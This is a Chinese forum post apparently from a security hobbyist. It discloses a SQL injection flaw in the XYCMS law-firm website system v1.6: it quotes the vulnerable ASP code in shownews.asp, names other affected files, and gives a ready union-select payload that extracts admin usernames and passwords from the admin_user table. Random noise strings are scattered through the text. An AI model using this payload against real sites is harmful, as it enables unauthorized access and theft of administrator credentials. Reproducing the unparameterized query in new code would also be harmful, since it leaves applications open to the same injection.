前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似& m+ t; b- p0 W3 |
" ?& `! q Q) F2 L5 |9 Y淫荡分割线
; t% m3 ?$ F( G) K4 K6 O- d--------------------------------------------------------
1 \; a% w: V; y' C2 _, q% q & @9 E0 p! m; f
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测), `( @% t: O+ V3 d0 n# U
源码地址:http://down.chinaz.com/soft/29233.htm
5 R( {7 J5 I% U) G ! r& N! u+ ~6 `* U# u/ u# i
漏洞文件:shownews.asp+ s, b) a- s5 i5 a
漏洞代码:7-13行
% C" f1 r/ Q! [1 J- `5 `
6 C8 s+ c: B0 G. D' }
) T4 ]; R0 b1 \: O+ o' z<%
) s3 N. N! t) l, v# fid=request.QueryString("id")$ y+ B9 C. m- s5 v: I9 k
1 y+ D. d3 m% D. R; `- c2 B
set snews=server.createobject("adodb.recordset")
- m4 l! {: B7 f; b* ]6 N7 Z# ]exec="select * from [news] where id="&id1 e, R! U; Q* _
snews.open exec,conn,1,13 Z* |9 {# W; { c
%>6 N; \2 ]7 r& }) @/ |
8 o7 N h; Q3 E" A
# C# n- n( L9 r- j4 y什么过滤都没有 直造成注入$ t+ ?" T, `& K- Z! h5 V
/ m& j& O; a1 }. q注入点:http://127.0.0.1:99/shownews.asp?id=xx
0 W2 q/ H4 L, i
/ G ], C4 h; f' }3 V" r% Y& A. e其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找$ H. [/ u9 W* B8 P0 h3 ]: N1 _" x
2 S; G9 k& P2 S0 N
, X) X- r" K, r( S* r7 q, Gexp: union select 1,admin,password,4,5,7 from admin_user" Z8 N# p2 j8 r6 F X$ K
3 ]! ~1 ?/ ?$ v% V |
发表于 2013-4-4 17:28:12
收藏
支持
反对